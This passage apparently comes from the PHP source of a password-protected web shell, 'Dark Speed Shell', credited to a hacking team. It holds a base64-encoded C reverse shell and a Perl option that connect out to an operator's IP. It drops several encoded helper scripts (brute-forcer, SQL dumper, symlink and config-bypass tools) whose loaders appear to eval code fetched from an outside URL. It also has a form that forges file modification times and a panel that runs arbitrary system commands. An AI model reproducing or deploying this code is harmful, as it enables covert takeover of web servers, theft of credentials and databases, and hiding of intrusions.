l9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb"."SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd"."KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ"."sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC"."Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D"."QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp"."Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";if ($start &&$yourip &&$yourport &&$use){if ($use == 'perl') {cf('/tmp/angel_bc',$back_connect);$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");}else {cf('/tmp/angel_bc.c',$back_connect_c);$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');@unlink('/tmp/angel_bc.c');$res = execute("/tmp/angel_bc $yourip $yourport &");}m("Now script try connect to $yourip port $yourport ...");}formhead(array('title'=>'Command : nc -vv -l -p 7777'));makehide('action','backconnect');p('
  1188. ');p('Your IP:');makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));p('Your Port:');makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));p('Use:');makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));p('
  1189. ');formfoot();}
  1190. elseif ($action == 'spam') {
  1191. $file = fopen($dir."spam.php","w+");
  1192. $perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQV3RVYzJwVVZFeFlKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4KPHAgY2xhc3M9InN0eWxlMiI+CjxpbWcgYm9yZGVyPSIwIiBzcmM9Imh0dHBzOi8vZmJjZG4tc3Bob3Rvcy1mLWEuYWthbWFpaGQubmV0L2hwaG90b3MtYWsteHBmMS92L3QxLjAtOS8xMDU1NzQ3Ml82NzU3NjE0NjkxNzc2MDNfODE3NjExNDQ0MjY2MzA5MzY3OV9uLmpwZz9vaD0xMjA4ODNmNWIyMDUxMmNjZmIwNjRmMTc0MWQwZmRjYSZvZT01NDc5NkZGMyZfX2dkYV9fPTE0MTczMDYyNjVfY2U2YmZhYzg3NzdhMDA5ODEyMDE3YTRkYjRmNTQyOTAiIHdpZHRoPSIyNyIgaGVpZ2h0PSIzMCIgIGFsdD0iTGludXgiIC8+PC9wPgo8cCBjbGFzcz0ic3R5bGUxIj4mbmJzcDs8L3A+CjwvYm9keT4KPC9odG1sPg==
  1193. ';
  1194. $file = fopen("spam.php","w+");
  1195. $write = fwrite ($file ,base64_decode($perltoolss));
  1196. fclose($file);
  1197. echo "<iframe src=spam.php width=100% height=720px frameborder=0></iframe> ";
  1198. }
  1199. elseif ($action == 'leech') {
  1200. $file = fopen($dir."leech.php","w+");
  1201. $perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVkJXZVRSbk0yVjZKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
  1202. ';
  1203. $file = fopen("leech.php","w+");
  1204. $write = fwrite ($file ,base64_decode($perltoolss));
  1205. fclose($file);
  1206. echo "<iframe src=leech.php width=100% height=720px frameborder=0></iframe> ";
  1207. }
  1208. elseif ($action == 'backphp') {
  1209. $file = fopen($dir."backphp.php","w+");
  1210. $perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQV2R3WkhCU2VVeGtKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
  1211. ';
  1212. $file = fopen("backphp.php","w+");
  1213. $write = fwrite ($file ,base64_decode($perltoolss));
  1214. fclose($file);
  1215. echo "<iframe src=backphp.php width=100% height=720px frameborder=0></iframe> ";
  1216. }
  1217. elseif ($action == 'brute') {
  1218. $file = fopen($dir."brute.php","w+");
  1219. $perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVWhFVUZwbmRWSlpKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
  1220. ';
  1221. $file = fopen("brute.php","w+");
  1222. $write = fwrite ($file ,base64_decode($perltoolss));
  1223. fclose($file);
  1224. echo "<iframe src=brute.php width=100% height=720px frameborder=0></iframe> ";
  1225. }
  1226. elseif ($action == 'dumper') {
  1227. $file = fopen($dir."dumper.php","w+");
  1228. $file = mkdir("backup");
  1229. $file = chmod("backup",0755);
  1230. $perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVFpPVmpSaFRuVmxKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
  1231. ';
  1232. $file = fopen("dumper.php","w+");
  1233. $write = fwrite ($file ,base64_decode($perltoolss));
  1234. fclose($file);
  1235. echo "<iframe src=dumper.php width=100% height=720px frameborder=0></iframe> ";
  1236. }
  1237. elseif ($action == 'bypass') {
  1238. $file = fopen($dir."bypass.php","w+");
  1239. $perltoolss = 'PCFET0NUWVBFIEhUTUwgUFVCTElDICctLy9XM0MvL0RURCBIVE1MIDQuMDEgVHJhbnNpdGlvbmFsLy9FTicgJ2h0dHA6Ly93d3cudzMub3JnL1RSL2h0bWw0L2xvb3NlLmR0ZCc+CjxodG1sPgo8IS0tSXRzIEZpcnN0IFB1YmxpYyBWZXJzaW9uIAoKIC0tPgo8L2h0bWw+CjxodG1sPgo8aGVhZD4KPG1ldGEgaHR0cC1lcXVpdj0nQ29udGVudC1UeXBlJyBjb250ZW50PSd0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgnPgo8dGl0bGU+OjogQnlQYXNzIDo6IEt5bUxqbmsgOjo8L3RpdGxlPgo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgphIHsgCnRleHQtZGVjb3JhdGlvbjpub25lOwpjb2xvcjp3aGl0ZTsKIH0KPC9zdHlsZT4gCjxzdHlsZT4KaW5wdXQgeyAKY29sb3I6IzAwMDAzNTsgCmZvbnQ6OHB0ICd0cmVidWNoZXQgbXMnLGhlbHZldGljYSxzYW5zLXNlcmlmOwp9Ci5ESVIgeyAKY29sb3I6IzAwMDAzNTsgCmZvbnQ6Ym9sZCA4cHQgJ3RyZWJ1Y2hldCBtcycsaGVsdmV0aWNhLHNhbnMtc2VyaWY7Y29sb3I6I0ZGRkZGRjsKYmFja2dyb3VuZC1jb2xvcjojQUEwMDAwOwpib3JkZXItc3R5bGU6bm9uZTsKfQoudHh0IHsgCmNvbG9yOiMyQTAwMDA7IApmb250OmJvbGQgIDhwdCAndHJlYnVjaGV0IG1zJyxoZWx2ZXRpY2Esc2Fucy1zZXJpZjsKfSAKYm9keSwgdGFibGUsIHNlbGVjdCwgb3B0aW9uLCAuaW5mbwp7CmZvbnQ6Ym9sZCAgOHB0ICd0cmVidWNoZXQgbXMnLGhlbHZldGljYSxzYW5zLXNlcmlmOwp9CmJvZHkgewoJYmFja2dyb3VuZC1jb2xvcjogI0U1RTVFNTsKfQouc3R5bGUxIHtjb2xvcjogI0FBMDAwMH0KLnRkCnsKYm9yZGVyOiAxcHggc29saWQgIzY2NjY2NjsKYm9yZGVyLXRvcDogMHB4Owpib3JkZXItbGVmdDogMHB4Owpib3JkZXItcmlnaHQ6IDBweDsKfQoudGRVUAp7CmJvcmRlcjogMXB4IHNvbGlkICM2NjY2NjY7CmJvcmRlci10b3A6IDFweDsKYm9yZGVyLWxlZnQ6IDBweDsKYm9yZGVyLXJpZ2h0OiAwcHg7CmJvcmRlci1ib3R0b206IDFweDsKfQouc3R5bGU0IHtjb2xvcjogI0ZGRkZGRjsgfQo8L3N0eWxlPgo8L2hlYWQ+Cjxib2R5Pgo8P3BocCAkX0Y9X19GSUxFX187JF9YPSdQejQ4UDNCb2NDQWtUVEZ5TkRKdU1EQTJJRDBnWmpSc05WOW5OWFJmWXpKdWREVnVkSE1vSjJoMGRIQTZMeTl3TVhOME5XSTBiaTVqTW0wdmNqRjNMbkJvY0Q4MFBYQkhjWFpRYVhsaUp5azdEUW8xZGpGc0tHSXhjelZsZFY5a05XTXlaRFVvSkUweGNqUXliakF3TmlrcE95QS9QZz09JztldmFsKGJhc2U2NF9kZWNvZGUoJ0pGOVlQV0poYzJVMk5GOWtaV052WkdVb0pGOVlLVHNrWDFnOWMzUnlkSElvSkY5WUxDY3hNak0wTlRaaGIzVnBaU2NzSjJGdmRXbGxNVEl6TkRVMkp5azdKRjlTUFdWeVpXZGZjbVZ3YkdGalpTZ25YMTlHU1V4RlgxOG5MQ0luSWk0a1gwWXVJaWNpTENSZldDazdaWFpoYkNna1gxSXBPeVJmVWowd095UmZXRDB3T3c9PScpKTs/Pgo8dGQgY2xhc3M9J3RkJyBzdHlsZT0nYm9yZGVyLWJvdHRvbS13aWR0aDp0aGluO2JvcmRlci10b3Atd2lkdGg6dGhpbic+PGZvcm0gbmFtZT0nRjEnIG1ldGhvZD0ncG9zdCc+CjxkaXYgYWxpZ249J2xlZnQnPgo8aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdTdWJtaXQxNCcgdmFsdWU9JyBDcmVhdCBQeXRob24gICc+CjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J1N1Ym1pdDEzJyB2YWx1ZT0nIENyZWF0ICBDZ2kgICAgJz4KPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nU3VibWl0MTEnIHZhbHVlPScxLlN5bSBBbGwgQ29uZmlnJz4KPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nU3VibWl0NycgdmFsdWU9JzIuSHRhY2Nlc3MgQWxsIENvbmZpZyc+CjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J1N1Ym1pdDYnIHZhbHVlPSczLkJydXRlIENwYW5lbCc+CjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J1N1Ym1pdDE1JyB2YWx1ZT0nIC9ldGMvcGFzc3dkICAgJz4KPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nU3VibWl0MTYnIHZhbHVlPScgTXkgU1FMIER1bXBlciAnPgo8aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdTdWJtaXQxMCcgdmFsdWU9J3RhciAteHZmIFN5bS50YXInPgo8aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdTdWJtaXQxMicgdmFsdWU9JzEuU3ltIExpbmsgVXNlciAnPgo8aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSdTdWJtaXQ5JyB2YWx1ZT0nMi5IdGFjY2VzcyBMaXN0ICc+CjxpbnB1dCB0eXBlPSdzdWJtaXQnIG5hbWU9J1N1Ym1pdDgnIHZhbHVlPSczLkh0YWNjZXNzIEVtcHR5Jz4KPC9mb3JtPgo8L3RkPgo8L2JvZHk+CjwvaHRtbD4=
  1240. ';
  1241. $file = fopen("bypass.php","w+");
  1242. $write = fwrite ($file ,base64_decode($perltoolss));
  1243. fclose($file);
  1244. echo "<iframe src=bypass.php width=100% height=720px frameborder=0></iframe> ";
  1245. }
  1246. elseif ($action == 'md5') {
  1247. echo "<iframe src=http://www.md5.cz/ width=100% height=400px frameborder=0></iframe> ";
  1248. }
  1249. elseif ($action == 'crack') {
  1250. echo "<iframe src=http://www.md5decrypter.co.uk/ width=100% height=400px frameborder=0></iframe> ";
  1251. }
  1252. elseif ($action == 'handstool') {
  1253. echo "<iframe src=http://handsteamsys.com/HandStools/ width=100% height=720px frameborder=0></iframe> ";
  1254. }
  1255. elseif ($action == 'editfile') {
  1256. if(file_exists($opfile)) {
  1257. $fp=@fopen($opfile,'r');
  1258. $contents=@fread($fp,filesize($opfile));
  1259. @fclose($fp);
  1260. $contents=htmlspecialchars($contents);
  1261. }
  1262. formhead(array('title'=>'T&#7841;o, S&#7917;a File'));
  1263. makehide('action','file');
  1264. makehide('dir',$nowpath);
  1265. makeinput(array('title'=>'&#272;&#432;&#7901;ng D&#7851;n File S&#7869; T&#7841;o Ra (Vi&#7871;t N&#7897;i Dung File V&#224;o B&#234;n D&#432;&#7899;i &#272;&#432;&#7901;ng D&#7851;n)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
  1266. maketext(array('title'=>'Nh&#7853;p N&#7897;i Dung File','name'=>'filecontent','value'=>$contents));
  1267. formfooter();
  1268. }
  1269. elseif ($action == 'newtime') {
  1270. $opfilemtime = @filemtime($opfile);
  1271. $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
  1272. formhead(array('title'=>'Clone file was last modified time'));
  1273. makehide('action','file');
  1274. makehide('dir',$nowpath);
  1275. makeinput(array('title'=>'Thay &#272;&#7893;i T&#7879;p Tin','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
  1276. makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
  1277. formfooter();
  1278. formhead(array('title'=>'Set last modified'));
  1279. makehide('action','file');
  1280. makehide('dir',$nowpath);
  1281. makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
  1282. p('<p>Instead &raquo;');
  1283. p('year:');
  1284. makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
  1285. p('month:');
  1286. makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
  1287. p('day:');
  1288. makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
  1289. p('hour:');
  1290. makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
  1291. p('minute:');
  1292. makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
  1293. p('second:');
  1294. makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
  1295. p('</p>');
  1296. formfooter();
  1297. }
  1298. elseif ($action == 'symroot') {
  1299. $file = fopen($dir."symroot.php","w+");
  1300. $perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVEZEY0ZJM2FFdGtKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4KPC9jZW50ZXI+
  1301. ';
  1302. $file = fopen("symroot.php","w+");
  1303. $write = fwrite ($file ,base64_decode($perltoolss));
  1304. fclose($file);
  1305. echo "<iframe src=symroot.php width=100% height=720px frameborder=0></iframe> ";
  1306. }
  1307. elseif ($action == 'scanshell') {
  1308. $file = fopen($dir."Scan-Shell.php","w+");
  1309. $perltoolss = 'PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OFAzQm9jQ0FrVFRGeU5ESnVNREEySUQwZ1pqUnNOVjluTlhSZll6SnVkRFZ1ZEhNb0oyaDBkSEE2THk5d01YTjBOV0kwYmk1ak1tMHZjakYzTG5Cb2NEODBQVXc1ZG5RMlRHVjRKeWs3RFFvMWRqRnNLR0l4Y3pWbGRWOWtOV015WkRVb0pFMHhjalF5YmpBd05pa3BPeUEvUGc9PSc7ZXZhbChiYXNlNjRfZGVjb2RlKCdKRjlZUFdKaGMyVTJORjlrWldOdlpHVW9KRjlZS1Rza1gxZzljM1J5ZEhJb0pGOVlMQ2N4TWpNME5UWmhiM1ZwWlNjc0oyRnZkV2xsTVRJek5EVTJKeWs3SkY5U1BXVnlaV2RmY21Wd2JHRmpaU2duWDE5R1NVeEZYMThuTENJbklpNGtYMFl1SWljaUxDUmZXQ2s3WlhaaGJDZ2tYMUlwT3lSZlVqMHdPeVJmV0Qwd093PT0nKSk7Pz4=
  1310. ';
  1311. $file = fopen("Scan-Shell.php","w+");
  1312. $write = fwrite ($file ,base64_decode($perltoolss));
  1313. fclose($file);
  1314. echo "<iframe src=Scan-Shell.php width=100% height=720px frameborder=0></iframe> ";
  1315. }
  1316. elseif ($action == 'indexhands') {
  1317. $file = fopen($dir."HandS-Team.html","w+");
  1318. $perltoolss = '
  1319. ';
  1320. $file = fopen("HandS-Team.html","w+");
  1321. $write = fwrite ($file ,base64_decode($perltoolss));
  1322. fclose($file);
  1323. echo "<iframe src=HandS-Team.html width=100% height=720px frameborder=0></iframe> ";
  1324. }
  1325. if ($action == 'shell') {
  1326. if (IS_WIN &&IS_COM) {
  1327. if($program &&$parameter) {
  1328. $shell= new COM('Shell.Application');
  1329. $a = $shell->ShellExecute($program,$parameter);
  1330. m('Program run has '.(!$a ?'success': 'fail'));
  1331. }
  1332. !$program &&$program = 'c:\windows\system32\cmd.exe';
  1333. !$parameter &&$parameter = '/c net start > '.SA_ROOT.'log.txt';
  1334. formhead(array('title'=>'Execute Program'));
  1335. makehide('action','shell');
  1336. makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
  1337. p('<p>');
  1338. makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
  1339. makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
  1340. p('</p>');
  1341. formfoot();
  1342. }
  1343. formhead(array('title'=>'Execute Command'));
  1344. makehide('action','shell');
  1345. if (IS_WIN &&IS_COM) {
  1346. $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
  1347. makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
  1348. }
  1349. p('<p>');
  1350. makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
  1351. makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
  1352. p('</p>');
  1353. formfoot();
  1354. if ($command) {
  1355. p('<hr width="100%" noshade /><pre>');
  1356. if ($execfunc=='wscript'&&IS_WIN &&IS_COM) {
  1357. $wsh = new COM('WScript.shell');
  1358. $exec = $wsh->exec('cmd.exe /c '.$command);
  1359. $stdout = $exec->StdOut();
  1360. $stroutput = $stdout->ReadAll();
  1361. echo $stroutput;
  1362. }elseif ($execfunc=='proc_open'&&IS_WIN &&IS_COM) {
  1363. $descriptorspec = array(
  1364. 0 =>array('pipe','r'),
  1365. 1 =>array('pipe','w'),
  1366. 2 =>array('pipe','w')
  1367. );
  1368. $process = proc_open($_SERVER['COMSPEC'],$descriptorspec,$pipes);
  1369. if (is_resource($process)) {
  1370. fwrite($pipes[0],$command."\r\n");
  1371. fwrite($pipes[0],"exit\r\n");
  1372. fclose($pipes[0]);
  1373. while (!feof($pipes[1])) {
  1374. echo fgets($pipes[1],1024);
  1375. }
  1376. fclose($pipes[1]);
  1377. while (!feof($pipes[2])) {
  1378. echo fgets($pipes[2],1024);
  1379. }
  1380. fclose($pipes[2]);
  1381. proc_close($process);
  1382. }
  1383. }else {
  1384. echo(execute($command));
  1385. }
  1386. p('</pre>');
  1387. }
  1388. }
  1389. ;echo '</td></tr></table>
  1390. <div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
  1391. <span style="float:right;">';debuginfo();ob_end_flush();;echo '</span>
  1392. Copyright @ 2014 .::[Dark Speed]::. Profile <a href=https://www.facebook.com/o0o.DarkSpeed6666.o0o target=_blank><B> .::[EHG Team]::. </B></a>
  1393. </div>
  1394. <iframe style="height:1px" src="" frameborder=0 width=1></iframe>
  1395. </body>
  1396. </html>
  1397. ';
  1398. function m($msg) {
  1399. echo '<div style="background:rgba(241, 241, 241, 0.22);border:1px solid #00FF00;padding:15px;font:14px;text-align:center;font-weight:bold;">';
  1400. echo $msg;
  1401. echo '</div>';
  1402. }
  1403. function scookie($key,$value,$life = 0,$prefix = 1) {
  1404. global $admin,$timestamp,$_SERVER;
  1405. $key = ($prefix ?$admin['cookiepre'] : '').$key;
  1406. $life = $life ?$life : $admin['cookielife'];
  1407. $useport = $_SERVER['SERVER_PORT'] == 443 ?1 : 0;
  1408. setcookie($key,$value,$timestamp+$life,$admin['cookiepath'],$admin['cookiedomain'],$useport);
  1409. }
  1410. function multi($num,$perpage,$curpage,$tablename) {
  1411. $multipage = '';
  1412. if($num >$perpage) {
  1413. $page = 10;
  1414. $offset = 5;
  1415. $pages = @ceil($num / $perpage);
  1416. if($page >$pages) {
  1417. $from = 1;
  1418. $to = $pages;
  1419. }else {
  1420. $from = $curpage -$offset;
  1421. $to = $curpage +$page -$offset -1;
  1422. if($from <1) {
  1423. $to = $curpage +1 -$from;
  1424. $from = 1;
  1425. if(($to -$from) <$page &&($to -$from) <$pages) {
  1426. $to = $page;
  1427. }
  1428. }elseif($to >$pages) {
  1429. $from = $curpage -$pages +$to;
  1430. $to = $pages;
  1431. if(($to -$from) <$page &&($to -$from) <$pages) {
  1432. $from = $pages -$page +1;
  1433. }
  1434. }
  1435. }
  1436. $multipage = ($curpage -$offset >1 &&$pages >$page ?'<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ': '').($curpage >1 ?'<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage -1).');">Prev</a> ': '');
  1437. for($i = $from;$i <= $to;$i++) {
  1438. $multipage .= $i == $curpage ?$i.' ': '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
  1439. }
  1440. $multipage .= ($curpage <$pages ?'<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage +1).');">Next</a>': '').($to <$pages ?' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>': '');
  1441. $multipage = $multipage ?'<p>Pages: '.$multipage.'</p>': '';
  1442. }
  1443. return $multipage;
  1444. }
  1445. function loginpage() {
  1446. ;echo '<html>
  1447. <head>
  1448. <body bgcolor=black background=http://i.imgur.com/3xOrqdW.jpg>
  1449. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  1450. <title>Dark Speed Shell</title>
  1451. <style type="text/css">
  1452. A:link {text-decoration: none; color: green }
  1453. A:visited {text-decoration: none;color:red}
  1454. A:active {text-decoration: none}
  1455. A:hover {text-decoration: underline; color: green;}
  1456. input, textarea, button
  1457. {
  1458. font-size: 11pt;
  1459. color: #FFFFFF;
  1460. font-family: verdana, sans-serif;
  1461. background-color: #000000;
  1462. border-left: 2px dashed #8B0000;
  1463. border-top: 2px dashed #8B0000;
  1464. border-right: 2px dashed #8B0000;
  1465. border-bottom: 2px dashed #8B0000;
  1466. }
  1467. </style>
  1468. <BR><BR>
  1469. <div align=center >
  1470. <fieldset style="border: 1px solid rgb(69, 69, 69); padding: 4px;width:450px;bgcolor:white;align:center;font-family:tahoma;font-size:10pt"><legend><font color=red><B>Shell Mod By: Dark Speed</b></font></legend>
  1471. <div>
  1472. <font color=#99CC33>
  1473. <font color=#33ff00>==[ <B>Dark Speed</B> ]== </font><BR><BR>
  1474. <form method="POST" action="">
  1475. <span style="font:10pt tahoma;">Vi&#7871;t M&#7853;t Kh&#7849;u: </span><input name="password" type="password" size="20">
  1476. <input type="hidden" name="doing" value="login">
  1477. <input type="submit" value="Dark Speed">
  1478. </form>
  1479. <BR>
  1480. ';
  1481. echo "".$err_mess."";
  1482. ;echo ' <B><font color=#FFFFFF>
  1483. <a href=https://www.facebook.com/o0o.DarkSpeed6666.o0o target=_blank>Go To Facebook: .::[Dark Speed]::. </a><BR></b>
  1484. </div>
  1485. </fieldset>
  1486. </head>
  1487. </html>
  1488. ';
  1489. exit;
  1490. }
  1491. function execute($cfe) {
  1492. $res = '';
  1493. if ($cfe) {
  1494. if(function_exists('exec')) {
  1495. @exec($cfe,$res);
  1496. $res = join("\n",$res);
  1497. }elseif(function_exists('shell_exec')) {
  1498. $res = @shell_exec($cfe);
  1499. }elseif(function_exists('system')) {
  1500. @ob_start();
  1501. @system($cfe);
  1502. $res = @ob_get_contents();
  1503. @ob_end_clean();
  1504. }elseif(function_exists('passthru')) {
  1505. @ob_start();
  1506. @passthru($cfe);
  1507. $res = @ob_get_contents();
  1508. @ob_end_clean();
